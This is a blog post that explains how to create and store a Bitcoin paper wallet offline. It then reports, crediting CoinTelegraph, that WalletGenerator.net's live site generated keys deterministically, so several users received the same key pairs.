Bitcoin Paper Wallet Vulnerability That Gave Same Key to Multiple Users.


Paper Wallet Vulnerability That Gave Same Key to Multiple Users. "Beware"

What is a Paper Wallet?
A paper wallet is an offline mechanism for storing Cryptocurrency like Bitcoin. The process involves printing the private keys and Bitcoin addresses onto paper. Physical wallets, also known as "physical Bitcoins," are considered one of the safest ways to store Bitcoins; if properly constructed, and provided that certain precautions are taken, it will be nearly impossible for a hostile user to access your Bitcoin holdings. Images of physical Bitcoins are commonly seen in media coverage in innovative styles, mostly with a ‘new look’ of the coin and the private key printed either on paper, plastic, or metal.

Follow the security checklist recommendation
First step is to download this website from Github and open the index.html file directly from your computer. It's just too easy to sneak some evil code in the 6000+ lines of javascript to leak your private key, and you don't want to see your fund stolen. Code version control make it much easier to cross-check what actually run. For extra security, unplug your Internet access while generating your wallet.

Step 1. Generate new address
Choose your currency and click on the "Generate new address" button.

Step 2. Print the Paper Wallet
Click the Paper Wallet tab and print the page on high quality setting. Never save the page as a PDF file to print it later since a file is more likely to be hacked than a piece of paper.

Step 3. Fold the Paper Wallet
Fold your new Paper wallet following the lines. Fold in half lengthwise, and then in three widthwise.

You can insert one side inside the other to lock the wallet.

Step 4. Share your public address
Use your public address to receive money from other crypto-currency users. You can share your public address as much as you want.

Step 5. Keep your private key secret
The private key is literally the keys to your coins, if someone was to obtain it, they could withdraw the funds currently in the wallet, and any funds that might be deposited in that wallet.

Please test spending a small amount before receiving any large payments.

Computer Researcher Finds Wallet Vulnerability That Gave Same Key to Multiple Users.

Online cryptocurrency paper wallet creator WalletGenerator.net previously ran on code that caused private key/public key pairs to be issued to multiple users. The vulnerability was described in an official blog post by security research Harry Denley of MyCrypto on May 24.

According to the post, the bad code was in effect by August 2018, and was only recently patched out as of May 23. The live code on the website is reportedly supposed to be open source and audited on GitHub, but there were differences detected between the two. After researching the live code, Denley concluded that the keys were deterministically generated on the live version of the website, not randomly.

In one of MyCrypto’s tests between May 18–23, they attempted to use the website’s bulk generator to make 1,000 keys. The GitHub version returned 1,000 unique keys, but the live code returned 120 keys. Running the bulk generator always reportedly returned 120 unique keys instead of 1,000 even when other factors were tweaked, including browser refreshes, VPN changes, or user changes.

Randomness is needed to generate the key pairings in order for the paper wallets to be secure. As the post puts it:

“ELI5: When generating a key, you take a super-random number, turn it into the private key, and turn that into the public key / address. However, if the ‘super-random' number is always ‘5,’ the private key that is generated will always be the same. This is why it’s so important that the super-random number is actually random…not ‘5.’”

WalletGenerator patched the determinism problem after MyCrypto reached out during the middle of its investigation. WalletGenerator purportedly responded afterward saying that the allegations could not be verified, and even asked the correspondent if MyCrypto was a “phishing website.”

MyCrypto added that users who generated keypairs after August 17, 2018 should immediately move their funds to a different wallet and recommended not to use WalletGenerator.net.

As previously reported by Cointelegraph, a so-called “blockchain bandit” made off with around 45,000 ether (ETH) by guessing weak private keys on the Ethereum blockchain.
Credit to 
on CoinTelegraph

Please leave us your comments if you ever got one or if you are willing to do it.  
Don't forget to subscribe to be up-to-date with the Crypto's News.


No comments:

Post a Comment